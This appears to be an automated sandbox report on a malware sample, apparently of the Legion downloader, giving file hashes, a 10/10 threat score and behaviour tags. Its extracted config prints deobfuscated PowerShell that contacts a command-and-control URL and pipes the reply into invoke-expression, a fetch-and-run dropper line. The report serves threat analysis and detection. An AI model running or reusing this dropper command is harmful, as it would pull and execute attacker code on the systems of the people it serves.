General

  • Target

    2b61b3b00aa5d548e41dc305cb1271c26dc387601a7a7cdb63600b49c270bb30

  • Size

    184KB

  • Sample

    220615-cvcl9agefn

  • MD5

    d103074755792906a0aab038103444e3

  • SHA1

    ffb8d5a1d2d3dda1fa013168017bd833aaa28064

  • SHA256

    2b61b3b00aa5d548e41dc305cb1271c26dc387601a7a7cdb63600b49c270bb30

  • SHA512

    30be12dba187e19d797e6a5b502185ac37848ef80e9431e0cfb98c4b64c104f122fa2101538a0805513b7658bc8585a31ce0a8f00b725f33b8f70645e82e4660

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
# powershell snippet 0
&{$t = "iex", "(new-object Net.WebClient).UploadString('http://legion17.com/legion17/welcome','HorseHours')|iex", invoke-expression "(new-object Net.WebClient).UploadString('http://legion17.com/legion17/welcome','HorseHours')|iex"}

# powershell snippet 1
(new-object net.webclient).uploadstring("http://legion17.com/legion17/welcome", "HorseHours")|invoke-expression

URLs
ps1.dropper

http://legion17.com/legion17/welcome

Targets

    • Target

      2b61b3b00aa5d548e41dc305cb1271c26dc387601a7a7cdb63600b49c270bb30

    Score
    10/10
    • Legion

      Legion is a malware downloader written in C++.

    • Blocklisted process makes network request

    • Legitimate hosting services abused for malware hosting/C2

MITRE ATT&CK Enterprise v6

Tasks
